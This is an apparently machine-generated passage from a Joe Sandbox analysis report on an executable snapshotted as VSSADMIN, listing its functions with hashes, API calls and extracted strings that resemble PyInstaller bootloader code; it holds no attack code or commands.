                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1334314998-0
                                                                                                                                                                      • Opcode ID: 1c41bceef5bab7983f86406795f12521f2ea94f9f1bc93d34e9ce900e1efe14c
                                                                                                                                                                      • Instruction ID: 8aec8c3890c902cc4ac93497c80bb4d67382b11ff42f5efbbd528e98c5d9673b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c41bceef5bab7983f86406795f12521f2ea94f9f1bc93d34e9ce900e1efe14c
                                                                                                                                                                      • Instruction Fuzzy Hash: 2941F762714E5582EF54CF2AE9941AAA3A2BB49FE0F059033EE0DC7B58DE3CD4469340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C86590 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 49058feddecaf3dd1a4174762c687f651d5e36b4e4df8639cc1e54ba905e9622
                                                                                                                                                                      • Instruction ID: 664f43ee599d2fb9e303e628b35ac3a52be0d6cc72b144f4ec5f428321a2ca34
                                                                                                                                                                      • Opcode Fuzzy Hash: 49058feddecaf3dd1a4174762c687f651d5e36b4e4df8639cc1e54ba905e9622
                                                                                                                                                                      • Instruction Fuzzy Hash: 27318472708F8382E7649F25648017E66E5AB86FA0F14423AEA8D93BD5DF3CD512A704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C989E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ea08c2437e4e3c4698eed2d9fd972e66d262d614c61166a858f736d4a7407d73
                                                                                                                                                                      • Instruction ID: aeaf816e591e2c668099b9429928107ed759d682a621f535d92789f07d1f5daa
                                                                                                                                                                      • Opcode Fuzzy Hash: ea08c2437e4e3c4698eed2d9fd972e66d262d614c61166a858f736d4a7407d73
                                                                                                                                                                      • Instruction Fuzzy Hash: F2F068717187558ADB988F69B44262977F0F7087D4F44C03AD58DC3B04DA3C90518F04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B8B0 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: deab79669d35d3f06de2a1b3ba32e81158c273845478c0e398c52fdc0538379a
                                                                                                                                                                      • Instruction ID: fbfddde5b07f7ba4b9e2215c3e37f64d3ef70ebada6f9bec33dc560e90df486e
                                                                                                                                                                      • Opcode Fuzzy Hash: deab79669d35d3f06de2a1b3ba32e81158c273845478c0e398c52fdc0538379a
                                                                                                                                                                      • Instruction Fuzzy Hash: D8A0026590CC46E1EE449B04F8D00302770FF52B69B400073D55DC30A0AF3EB440E301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C75F70 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                      • API String ID: 190572456-2208601799
                                                                                                                                                                      • Opcode ID: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction ID: cc77478cef4e4865c127855ced30ecffb89254863447c57f9a8509bea91ed954
                                                                                                                                                                      • Opcode Fuzzy Hash: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction Fuzzy Hash: E4E18564A0DF43A2FE558B18F9D017423B5AF17FB9BC46037C84E87664EF7EA5588201
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                      • String ID: P%
                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                      • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                      • Instruction ID: 6a098fbf13fc729f86e8d03fb4107a33b8e2e945738758404f7dd677c4b02f99
                                                                                                                                                                      • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                      • Instruction Fuzzy Hash: 33510426608BA187DA349F26E4581BAB7B1FB98B65F004122EBCF83684DF3DD045DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C80258 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                      • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                      • Instruction ID: aece6c676b0adb97a7f5f1c0a70427e95a1acb329a6bcbdebd219e3f3b4a6242
                                                                                                                                                                      • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                      • Instruction Fuzzy Hash: 2612B4B2E0C94786FB205B16E0946BA7271FB82F64F864137D699876C4DF3CE480EB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C712B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2030045667-3659356012
                                                                                                                                                                      • Opcode ID: e412112bf7a2c4920d5fc3316b35fb3f62ad84cc98d8238b18eca36b92c0785a
                                                                                                                                                                      • Instruction ID: a0598e4fadd19149a255bd768ab991572d06555c9effa631d1c1ddc6ed4a0ed0
                                                                                                                                                                      • Opcode Fuzzy Hash: e412112bf7a2c4920d5fc3316b35fb3f62ad84cc98d8238b18eca36b92c0785a
                                                                                                                                                                      • Instruction Fuzzy Hash: 32415E21A4CE8382EE24DB15E4916BA63B1EB86FA5F444433DE4D87B55EE3DE542C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7DC60 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                      • Opcode ID: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                      • Instruction ID: e6db290d1871e006f48daed5d6a3a2ad39328485cda6319e717c874abdb35841
                                                                                                                                                                      • Opcode Fuzzy Hash: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                      • Instruction Fuzzy Hash: BCE16F73A0CB4187EB209B65D4802AD77B0FB56BA9F104136EE4D97B55CF38E491C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77630 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C776CF
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C7771F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                                                                      • Opcode ID: 8e1294a6cdcfa841333753f07aa6236aad2a9565d39a981db328a5fb7b946298
                                                                                                                                                                      • Instruction ID: be9c5c0f96c7cc321c3e6c029572b49928f14f46e004a2b7fa553ec906b9ddcb
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e1294a6cdcfa841333753f07aa6236aad2a9565d39a981db328a5fb7b946298
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A416A32A0DF86C2E621DF15E48016AB6B5FB86BA4F584136DA8D87B95EF38E451C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77B70 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77BB1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77C25
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 3723044601-27947307
                                                                                                                                                                      • Opcode ID: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
                                                                                                                                                                      • Instruction ID: fe8a6ae26e3ecb7da4d6e6d34c4b00048e45e808c1be3054de304a6fa9a9bd34
                                                                                                                                                                      • Opcode Fuzzy Hash: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 28216B31A0DF4796EA109F16E8800797AB1EB9AFA4B584137CA4EC3794EF7DE411C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C89294 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$p$p
                                                                                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                                                                                      • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                      • Instruction ID: be00e0ded957f39a9aad41b3018f731060724f15afe17f63d3cda6ad63f9dafa
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 02128461E0C94386FB649A15D1942F976B1FB82F74F884137E68A876C4DF3CE580EB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77C60 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                      • API String ID: 626452242-876015163
                                                                                                                                                                      • Opcode ID: 474bf15368175ae00485da3c5c6deb92760f83e3752d56c97991419ab165e02e
                                                                                                                                                                      • Instruction ID: fc7d11dce1dbd0b2b2a54d215174a0690c67da5781ec21c6da92c7c9be470ab7
                                                                                                                                                                      • Opcode Fuzzy Hash: 474bf15368175ae00485da3c5c6deb92760f83e3752d56c97991419ab165e02e
                                                                                                                                                                      • Instruction Fuzzy Hash: 29418F32A0DE46C2EA10DF15E48017A66B5FB96FA4F148137DA8D87BA5EF3CE451C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7CF18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CF9D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFAB
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFD5
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D01B
